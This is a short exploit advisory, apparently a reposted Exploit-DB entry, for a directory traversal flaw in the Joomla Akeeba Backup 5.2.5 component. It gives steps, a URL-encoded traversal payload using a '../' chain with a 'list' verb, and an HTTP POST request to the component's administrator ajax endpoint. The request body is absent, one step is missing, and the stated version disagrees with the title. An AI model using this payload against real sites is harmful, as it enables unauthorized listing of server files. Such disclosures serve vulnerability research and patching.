Joomla Akeeba Backup 5.2.5 Directory Traversal

Joomla Akeeba Backup component version 5.2.5 suffers from a directory traversal vulnerability.

MD5 | 7af40fd2a0774230dd4fd2f32528ea7c

# Exploit Title: Joomla Component Akeeba Backup 5.2.5 - Directory Traversal
# Date: 2017-03-07
# Home :
# Version : Akeeba Backup Core 5.3.0.b1 (2017-02-22)
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM ([email protected])
# Home :
# Telegram Channel AND Demo: @PersianHackTeam

1)Include and Exclude Information Section
2)Click on Files and Directories Exclusion
4)Post action Parameter Encode as Url : {"root":"[SITEROOT]","node":"../../../../../../../","verb":"list"}

Request :

POST /joomla/administrator/index.php?option=com_akeeba&view=FileFilters&task=ajax HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 154
Cookie: 8924dd79f450c03ec0748f316908b847=vod11einhb2gaelq1um1jsje66
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache


# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers

Related Posts